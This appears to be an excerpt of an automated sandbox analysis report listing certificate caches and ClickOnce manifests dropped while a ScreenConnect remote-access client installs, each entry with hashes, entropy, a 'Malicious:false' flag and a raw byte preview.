                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328
                                                                                                                                                Entropy (8bit):3.141785112603811
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:kKAFE/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5kDnLNkPlE99SNxAhUe/3
                                                                                                                                                MD5:6C676BA5935757B586AB03647676E327
                                                                                                                                                SHA1:39F80D1CA002134F9BF7EE180358A9F1E886E910
                                                                                                                                                SHA-256:4F70584D32410E9FFB9ABDBDEDA7B1A9687883B9441649A5D2D83074B632FE60
                                                                                                                                                SHA-512:9C5343D222C09297C1D0F45040AA025E3D140DA31367A98FBE487C1BEC4D5720CF21FC7A193645DED4290A3657BD78E020FB962BA677B937B682F90AD7606403
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... ........}h......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):308
                                                                                                                                                Entropy (8bit):3.2220888806886414
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:kKXeFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:/eYtWOxSW0P3PeXJUZY
                                                                                                                                                MD5:5653E2C060F0292ED42A0F54E0C3FA6D
                                                                                                                                                SHA1:A650D13DAF2C536CFE82297F9C6A763CC57798C5
                                                                                                                                                SHA-256:FDA5F40D0CCB09A99DB290FFC8A6220518874A5F3C1CB8154FC1F5268203BD69
                                                                                                                                                SHA-512:AB8BF33E736B6C51A83AD7239DCEA423D53DDBFEB172B591FB1E451B38B300C6A1C411F6603CC1A1B85426C19FE81F69748E3EDC5B670B42453BAF44679B46C6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... .........J......(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):412
                                                                                                                                                Entropy (8bit):3.991359422503678
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:tmpVCZiXuUmxMiv8sFBSfamB3rbFURMOlAkr:Ups4Xhmxxv7Sf13rbQJr
                                                                                                                                                MD5:7DF12777E19D5909F86D697D63C9AF36
                                                                                                                                                SHA1:4DE3FBDFC5BECEFE76E36B0438669DE9B8AF6270
                                                                                                                                                SHA-256:ADA7894617CD8D91B234C44BF24321C254B3AD1B8F2BAFA9B2F44452DCEE0116
                                                                                                                                                SHA-512:9F9CC60EB919A6FDA5751E52B33A3F3436B1731982C8416CBEC57E3FD5FA91F08721088C2A2B48661F5C6663EB168F459EDFE1D6B7BE6493B6BC24B2529C283B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... ....(...h'h.....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.0499268689312156
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:kKHpkzLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:PpkzLYS4tWOxSW0PAMsZp
                                                                                                                                                MD5:3FA124E113A391DADE7606D1E2361E60
                                                                                                                                                SHA1:A8C81D3A810950375E9C7BC4C1DB44433C962B3B
                                                                                                                                                SHA-256:21FBB4ADEB024F5579458131B9B771098603321A02DD82B4C0BFD4662069CD11
                                                                                                                                                SHA-512:CDBE3F05EDF2540F018D65F263EF6479A18CE66123B0693B50C391FB9731DE10DF7E007FDCC13CA2C4E9E818F2B67ECCBB531C204271369E7A114CE87EB5F354
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... ....l...)Fd.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):25496
                                                                                                                                                Entropy (8bit):5.553147094050681
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:Rlq7vjGo26tX9DkX9R/QPIBM7YsACMTH4aCaL/:RsDl26tX9DkX9R/QPI+0sA5THcar
                                                                                                                                                MD5:49DE42A8F61EF45AB9227BD7E98E00C0
                                                                                                                                                SHA1:391BA270C3F3184DAD7E7C1D7F49DDDAB15B886E
                                                                                                                                                SHA-256:DAA17656DBFF6266D1D18B5B33951195102A0E6624BA8841463BA69A58E82C4C
                                                                                                                                                SHA-512:CA8D600D77CC027312D39F309EC1D3DB29E22F2D94E03A2D4F8CBFD9C6E7123F67B1E16A1D23DAC636F870020397FB3AF40CCA9646B144A0566812DCC046F738
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH..........B.*..f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):17866
                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3452
                                                                                                                                                Entropy (8bit):4.335626157748952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:iIEfBeF7lWuWW+Lg0e6S+9owQX7g27mL438ciUcVM8Aw+ikDhIYX:iJ3uWWWeV+WwQXlmL4MckVM8Aw+rhIYX
                                                                                                                                                MD5:BA8C82944CC6C0E3AA36E5F4BD02D32C
                                                                                                                                                SHA1:BB42EF99AEBEDBD94C400FA59E0C576936B76634
                                                                                                                                                SHA-256:9B0F71A6334EE5EA0F7F5C6A86B2158D0D46261B54DEEFB7BC21EB1BEF054F17
                                                                                                                                                SHA-512:141BABB7F94682A9850930CD6AD312AD72E97583327B8763A3F6A700AFEE0CD2A385866492D34949A5A9AC802504C1E992C7505B35B80FA6C08734F257D3C545
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH........<.j...].#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................N...............................................N...............................................N...............................................N...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5260
                                                                                                                                                Entropy (8bit):4.184021961930826
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:6Nq6R84zeV+Ww7mk9O43jYHlIgBXw0vy3mx8wnjIbm:eR840JC9tUHlXBXm4vjd
                                                                                                                                                MD5:1BFE610C37A6FE03CBE94B90C9D0528B
                                                                                                                                                SHA1:1A3C30F02CD6883437C4EA485CCD5E25D3A4D4CB
                                                                                                                                                SHA-256:359299BDBBCFF55C4783B1D1CB2362C27791A512B87DD4BBB98EFBD650F956CF
                                                                                                                                                SHA-512:CBA7D1011F802C3410707BE33A3E2FB6034E0B72F17B246D1DEA29B37BA65AA684A23E57D64C198DBB38F26D19EE6E4943B6D9CA3BDEDDD279E378329B8D728D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH..........$D.L..4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................N...............................................N...............................................N...............................................N.......................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1982
                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6588
                                                                                                                                                Entropy (8bit):4.1092648551780515
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:B4MmxqeV+WwwU8WpZ2LRheuMl2UfdVaMsDksJqi/D5:2xlJwpZ2LRhyl5dVzRw75
                                                                                                                                                MD5:2960080A4546A513EB87F655B67AF100
                                                                                                                                                SHA1:D61EFD1ED8158C46A9897656C104B6D24C010326
                                                                                                                                                SHA-256:D3193E3981B45B8CE4021094120FB6B57674ECAC3B47A6908DAFA29B321433A1
                                                                                                                                                SHA-512:967D88306F488F312C4F7C3C6DEB291E614C8695EC3F18A33F95814BFAF19595F9BC850E2C5F84F01D725B0F64191B2094F74181A48EA5EF85C29CD4566F97FD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH..........H.....@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................N.......................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2573
                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3032
                                                                                                                                                Entropy (8bit):4.240250296786388
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:IMQSc2gue6S+9oww7g47JO2V42WAXznwbb:IXScUeV+WwwnJOr2WAXznEb
                                                                                                                                                MD5:A8C03C8EFDD92B21CE40FECC2E449A37
                                                                                                                                                SHA1:7E22EBDA26613859445444358E030D6907BB3766
                                                                                                                                                SHA-256:30ED9B7B4B06A6D17C48AA30C740450362F9385C7F44FF3349F414C114E7D7EC
                                                                                                                                                SHA-512:DA231D30063F39D9AD4237F0568FFC497B9C3A5F65D20970BDE68D2B7B70A8C27F7E0991B6AFC4D5D8D4FBED37430724B2221AA054FFF793B2B9408E12A32636
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH........!..G.U..............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................N...............................................N...............................................N...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1041
                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):14612
                                                                                                                                                Entropy (8bit):5.807501318100555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:7Wh4+3n9q5s6IHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoILgSl4uK:7WH9qS6ITX9dX9R/QPIBM7Y+li
                                                                                                                                                MD5:C188144BDA8F5A63DB7E140A986084FA
                                                                                                                                                SHA1:56F6A01084B089FAA1D451F876B888AEDF5E8841
                                                                                                                                                SHA-256:E28D6BE2829342D37609251A496CDD1176AD65BB43966FD55D1FE3F44AE23B5B
                                                                                                                                                SHA-512:FDBC4D107EBB70BC555644EE1B3934D837065ED13718D6516AF869A8CC6EF8ECAE12599A98369395C21B93441BCBD9321397DC1FDC576ED1F0E8AC80CAA56CC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH..........*yh..C$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om................-........................E..................................N...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):118084
                                                                                                                                                Entropy (8bit):5.584890162201507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
                                                                                                                                                MD5:9F442D8293F1917B8CD6F007F3FEEBE6
                                                                                                                                                SHA1:3065E347263BFEA93CC987DF08E9630EBCF3E870
                                                                                                                                                SHA-256:CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
                                                                                                                                                SHA-512:58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4428
                                                                                                                                                Entropy (8bit):4.040260429100267
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:GuQKXCD5v+1gLe6S+9ow87gFW75uvWbO2V42WAvf1fTO5CEkoDprOaJCf:GuvXQeV+Ww8U45ucOr2WAvFTOvkoNOrf
